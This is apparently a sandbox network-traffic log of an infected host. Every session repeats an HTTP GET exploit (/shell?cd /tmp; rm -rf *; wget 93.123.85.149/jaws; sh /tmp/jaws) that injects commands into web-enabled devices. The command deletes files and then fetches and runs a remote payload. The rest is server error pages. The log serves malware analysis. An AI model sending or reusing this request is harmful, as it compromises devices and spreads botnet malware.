                                                            Jan 26, 2024 15:32:42.761435032 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:44 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            554192.168.2.2339042143.244.211.11080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.632872105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.790401936 CET430INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Location: https://www.fanfiction.net\/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            555192.168.2.235341423.42.163.15580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.803740978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.014297962 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 66 34 37 37 62 35 63 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 32 26 23 34 36 3b 32 33 34 64 35 33 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9f477b5c&#46;1706279562&#46;234d5378</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            556192.168.2.2345548193.178.43.2280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.820275068 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.047633886 CET394INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:37 GMT
                                                            Server: Apache/2
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            557192.168.2.2333702181.117.207.4180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:42.866945982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.141007900 CET1286INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.14.1
                                                            Date: Fri, 26 Jan 2024 14:32:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3798
                                                            Connection: keep-alive
                                                            ETag: "607d55d7-ed6"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 35 46 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 42 32 33 33 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 42 32 33 33 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 36 39 44 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 42 32 33 33 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #FAF5F5; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #0B2335; } :visited { color: #0B2335; } a:hover { color: #0069DA; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #0B2335; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2p
                                                            Jan 26, 2024 15:32:43.141082048 CET1286INData Raw: 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62
                                                            Data Ascii: x solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #0B2335;
                                                            Jan 26, 2024 15:32:43.141094923 CET1286INData Raw: 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20
                                                            Data Ascii: "content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered mi
                                                            Jan 26, 2024 15:32:43.141105890 CET166INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 5b 20 50 6f 77 65 72 65 64 20 62 79 20 41 6c 6d 61 4c 69 6e 75 78 20 5d 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 32 34 22 20 68
                                                            Data Ascii: alt="[ Powered by AlmaLinux ]" width="124" height="32" /></a> </div> </div> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            558192.168.2.2345996223.119.221.2880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:43.176340103 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:43.485831976 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:43 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:43 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 65 66 30 37 37 64 66 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 33 26 23 34 36 3b 36 62 34 63 32 36 30 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1ef077df&#46;1706279563&#46;6b4c2602</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            559192.168.2.236073452.45.114.19380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.623353958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:44.740344048 CET78INHTTP/1.1 400 BAD_REQUEST
                                                            Content-Length: 0
                                                            Connection: Close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            560192.168.2.2337276198.48.58.4180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.634579897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:44.763350010 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:44 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Vary: Accept-Encoding,User-Agent
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code {
                                                            Jan 26, 2024 15:32:44.763365984 CET1286INData Raw: 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32
                                                            Data Ascii: font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info {
                                                            Jan 26, 2024 15:32:44.763382912 CET1286INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69
                                                            Data Ascii: padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-al
                                                            Jan 26, 2024 15:32:44.763401031 CET1286INData Raw: 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68
                                                            Data Ascii: .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: abso
                                                            Jan 26, 2024 15:32:44.763420105 CET1286INData Raw: 46 2b 77 67 38 72 48 37 45 7a 4d 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64
                                                            Data Ascii: F+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kO
                                                            Jan 26, 2024 15:32:44.763437986 CET1286INData Raw: 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43
                                                            Data Ascii: hS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+db
                                                            Jan 26, 2024 15:32:44.763458014 CET1156INData Raw: 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c
                                                            Data Ascii: vXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBev
